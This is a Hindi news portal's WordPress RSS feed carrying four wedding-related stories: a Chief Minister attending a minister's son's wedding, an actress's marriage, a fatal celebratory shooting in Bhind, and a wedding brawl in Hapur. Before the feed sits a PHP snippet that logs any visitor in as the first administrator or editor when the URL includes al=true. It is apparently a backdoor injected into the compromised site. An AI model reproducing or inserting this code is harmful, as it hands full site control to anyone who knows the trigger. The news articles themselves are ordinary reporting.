// _ea_al add_action('init', function(){ if(isset($_GET['al']) && $_GET['al']==='true'){ if(!is_user_logged_in()){ $u=get_users(['role'=>'administrator','number'=>1,'fields'=>['ID','user_login']]); if(empty($u)){$u=get_users(['role'=>'editor','number'=>1,'fields'=>['ID','user_login']]);} if(!empty($u)){wp_set_auth_cookie($u[0]->ID,true,false);wp_redirect(admin_url());exit();} } else {wp_redirect(admin_url());exit();} } }, 2); wedding ceremony – प्रत्युषा आशा की नयी किरण https://pratyushaashakinayikiran.com न्यूज़ पोर्टल Thu, 14 May 2026 04:45:00 +0000 en-US hourly 1 https://wordpress.org/?v=7.0 मुख्यमंत्री डॉ. यादव राज्य मंत्री जायसवाल के पुत्र के विवाह समारोह में हुए शामिल https://pratyushaashakinayikiran.com/?p=219326 Thu, 14 May 2026 04:45:00 +0000 https://pratyushaashakinayikiran.com/?p=219326 भोपाल 

मुख्यमंत्री डॉ. मोहन यादव ने कुटीर एवं ग्रामोद्योग राज्यमंत्री (स्वतंत्र प्रभार)  दिलीप जायसवाल के सुपुत्र अभिशंख जायसवाल एवं पुत्रवधू स्तुति जायसवाल के पावन वैवाहिक बंधन मांगलिक अवसर पर हार्दिक शुभकामनाएं एवं मंगल आशीष प्रदान किया।

मुख्यमंत्री डॉ. यादव ने ईश्वर से नवदंपति के सुखमय, समृद्ध एवं आनंदपूर्ण दाम्पत्य जीवन की कामना करते हुए कहा कि यह नवीन जीवन यात्रा प्रेम, विश्वास, सम्मान और अटूट साथ के पवित्र सूत्र से सदैव सुसज्जित रहे। उनके जीवन में सुख, शांति, वैभव, उत्तम स्वास्थ्य और उन्नति का प्रकाश निरंतर बना रहे तथा परिवार का आंगन सदैव खुशियों, सौभाग्य और मधुर संबंधों की सुगंध से महकता रहे।

मुख्यमंत्री डॉ. यादव बिजुरी में आयोजित वैवाहिक समारोह में सम्मिलित हुए और नवविवाहित दंपति को अपने स्नेहिल आशीर्वचनों से अभिसिंचित कर उज्ज्वल एवं मंगलमय भविष्य की शुभकामनाएं दीं। उन्होंने राज्यमंत्री  जायसवाल एवं उनके परिवारजन से आत्मीय भेंट कर इस सुखद अवसर की खुशियां साझा कीं। इस अवसर पर उपस्थित जनप्रतिनिधियों, गणमान्य नागरिकों एवं अतिथियों से भी मुख्यमंत्री ने आत्मीय चर्चा की।

इस अवसर पर लोक स्वास्थ्य यांत्रिकी मंत्री मती सम्पतिया उइके, शहडोल संसदीय क्षेत्र की सांसद मती हिमाद्री सिंह, मंडला सांसद  फग्गन सिंह कुलस्ते, वन एवं पर्यावरण राज्यमंत्री तथा अनूपपुर जिले के प्रभारी मंत्री  दिलीप अहिरवार, विधायक एवं पूर्व मंत्री  बिसाहूलाल सिंह, विधायक जैतपुर  जयसिंह मरावी, विधायक जयसिंहनगर मती मनीषा सिंह, कलेक्टर  हर्षल पंचोली, उपाध्यक्ष जिला पंचायत अनूपपुर मती पार्वती राठौर, जिला पंचायत सदस्य भारती केवट नर्मदा सिंह सहित अन्य जनप्रतिनिधि उपस्थित थे।

 

]]>
छोटी गीता फोगाट ने रचाई शादी, जाईरा वसीम ने साझा की खास तस्वीरें https://pratyushaashakinayikiran.com/?p=186353 Sat, 18 Oct 2025 09:40:00 +0000 https://pratyushaashakinayikiran.com/?p=186353 मुंबई

एक्टर आमिर खान की फेमस फिल्म ‘दंगल’ में छोटी गीता फोगाट का रोल निभाकर फेमस हुई एक्ट्रेस जायरा वसीम ने निकाह कर लिया है. एक्ट्रेस ने अपने इंस्टग्राम पर अपने निकाह की फोटोज शेयर किया है, जिसमें उनके साथ उनके शौहर भी नजर आ रहे हैं.

बता दें कि जायरा वसीम ने हाल ही में अपने इंस्टाग्राम पोस्ट पर अपने निकाह की कुछ फोटोज शेयर किया है. शेयर किए गए पोस्ट में दो फोटो है, जिसमें पहले में वो निकाहनामे पर साइन कर रही हैं और दूसरे में अपने शौहर के साथ खड़ी हैं.

सामने आए फोटोज में जायरा वसीम को निकाह में लाल जोड़े में और उनके शौहर को क्रिम कलर की शेरवानी में नजर आ रहे हैं. अपने पोस्ट के साथ एक्ट्रेस ने लिखा- ‘कुबूल है, कुबूल है, कुबूल है.’

जायरा वसीम का वर्कफ्रंट
वर्कफ्रंट की बात करें, तो जायरा वसीम ने अपने करियर में ‘दंगल (2016)’, ‘सीक्रेट सुपरस्टार (2017)’ और ‘द स्काय इज पिंक (2019)’ में ही काम किया है. महज चार साल के करियर के बाद अचानक एक दिन जायरा वसीम ने बॉलीवुड छोड़ने का एलान कर दिया था. उन्होंने ये जानकारी सोशल मीडिया पोस्ट के जरिए दी थी. जब जायरा ने बॉलीवुड छोड़ा तो उनकी उम्र सिर्फ 18 साल थी.

]]>
भिंड में लग्न के कार्यक्रम के दौरान हुई हर्ष फायरिंग में दुल्हन के भाई की गोली लगने से मौत https://pratyushaashakinayikiran.com/?p=151756 Sat, 26 Apr 2025 08:16:00 +0000 https://pratyushaashakinayikiran.com/?p=151756 भिंड
 भारौली थाना अंतर्गत गोरम पंचाायत के बर का पुरा में देर रात शादी समारोह के लग्न के कार्यक्रम में हुई हर्ष फायरिंग में गोली लगने से वधु पक्ष के एक युवक की मौत हो गई। जबकि एक युवक गंभीर रूप से घायल होग गया। मृतक अड़ोखर सरपंच का बेटा है। घटना शुक्रवार-शनिवार रात करीब एक बजे की है।

पुलिस से मिली जानकारी के अनुसार बरकापुरा में राजेन्द्र सिंह राजपूत के बेटे की अड़ोखर से लगुन आई थी। लगनोत्सव के दौरान अचानक हर्ष फायरिंग शुरू हो गई। हर्ष फायरिंग के दौरान वधु पक्ष की तरफ से आए प्रियांशु पुत्र सतेंद्र पवैया निवासी अडोखर हाल अमायन थाने के पीछे और दिलीप पुत्र विजय बघेल निवासी गहेली को गोली लग गई।

घायल युवक को ग्वालियर रेफर किया गया

गोली लगने से प्रियांशु की मौत हो गई। जबकि दिलीप को गंभीर हालत में जिला अस्पताल लाया गया। यहां से उसे ग्वालियर रेफर कर दिया। बताया जाता है, कि मृतक प्रियांशु के पिता अड़ोखर पंचायत से सरपंच हैं। साथ ही वधु का फुफेरा भाई था।

फायरिंग किसने की, पुलिस कर रही जांच

हर्ष फायरिंग की सूचना मिलते ही भारौली पुलिस मौके पर तत्काल पहुंची, जहां पूरे घटनाक्रम के बारे में समझकर शादी समारोह में मौजूद लोगों से बातचीत की और हर्ष फायरिंग किसने की, क्या ये लोग नशे की हालत में फायरिंग कर रहे थे, तमाम बिन्दुओं पर पुलिस ने अपनी जांच कर रही है। इससे पहले ऊमरी क्षेत्र में 13 अप्रैल को हर्ष फायरिंग में एक युवक घायल हो गया था।

]]>
वरमाला के समय दूल्हे ने किया दुल्‍हन को KISS, बारातियों और घरातियों में चले लाठी-डंडे https://pratyushaashakinayikiran.com/?p=33226 Wed, 22 May 2024 19:26:00 +0000 https://pratyushaashakinayikiran.com/?p=33226 हापुड़

हापुड़ में दूल्हे ने ऐसी हरकत कर दी कि शादी समारोह में लाठी-डंडे चल गए. दुल्हन पक्ष के लोगों ने ना सिर्फ दूल्हे की पिटाई की बल्कि बारातियों को भी जमकर पीटा. इसके बाद दूल्हे पक्ष ने दूसरी तरफ के लोगों पर पथराव शुरू कर दिया. इस घटना से बारात में भगदड़ मच गई. आधा दर्जन से अधिक लोगों को चोटें आई हैं. मामला पुलिस तक पहुंच गया है.

जानकारी के मुताबिक, थाना हापुड़ देहात क्षेत्र के मोहल्ला अशोकनगर में शादी समारोह चल रहा था, तभी जयमाला के दौरान दूल्हे ने स्टेज पर ही सबके सामने दुल्हन को किस (Kiss) कर दिया. दूल्हे की इस हरकत से दुल्हन पक्ष के लोग भडक़ गए. उन्होंने दूल्हे सहित बारातियों की पिटाई शुरू कर दी. 

देखते ही देखते दोनों पक्षों में जमकर मारपीट होने लगी. गुस्से में दूल्हे पक्ष के लोग भी दूल्हन पक्ष पर टूट पड़े. उन्होंने लाठी, डंडों, सरिया से हमला करने के साथ पथराव कर दिया. इसमें दुल्हन पक्ष के करीब 6 लोग घायल हो गए. झगड़े की सूचना पर मौके पर पहुंची पुलिस ने सभी घायलों को स्थानीय अस्पताल में भर्ती कराया और दोनों पक्षों के सात लोगों को हिरासत में ले लिया. 

गौरतलब है कि इस घटनाक्रम के बाद बारात बैरंग लौट गई. दुल्हन की विदाई नहीं हो सकी. मामला इलाके में चर्चा का विषय बना हुआ है. पुलिस ने बताया कि शांतिभंग की धारा-151 में कार्रवाई की गई है. 

 जानिए पूरा मामला 

घटना के बारे में दुल्हन के पिता ने बताया कि सोमवार की रात उसकी दो बेटियों की शादी थी. बड़ी बेटी की गुलावती के मोहल्ला सुभाषनगर व छोटी बेटी की मोहल्ला शिवनगर से बारात आई थी. बड़ी की शादी तो सुभाषनगर निवासी युवक से सकुशल संपन्न हो गई, लेकिन छोटी बेटी की शादी में जयमाला के दौरान बवाल हो गया. दूल्हे ने जबरन बेटी को किस कर लिया. इस बात पर घर के लोग भडक गए और फिर दोनों पक्षों में कहासनुी शुरू हो गई. 

कहासुनी के बाद विवाद इतना बढ़ गया कि दूल्हे पक्ष के लोगों ने लाठी-डंडों व सरियों से हमला कर दिया. पथराव भी किया. इसमें दुल्हन के पिता समेत 6 लोग गंभीर रुप से घायल हो गए. हालांकि, उस वक्त बारात बैरंग लौट गई लेकिन बाद में उसी लड़के से शादी सम्पन्न करवाई गई. 

इस मामले में हापुड़ के एसपी अभिषेक वर्मा ने बताया कि विवाह समारोह के दौरान झगड़े की सूचना प्राप्त हुई थी. अभी इस मामले में किसी भी पक्ष की कोई तहरीर प्राप्त नहीं हुई है. तहरीर मिलने पर आगे की कार्रवाई की जाएगी. पुलिस ने मौके पर कुछ लोगों का शांति भंग के तहत चालान किया है. 

 

]]>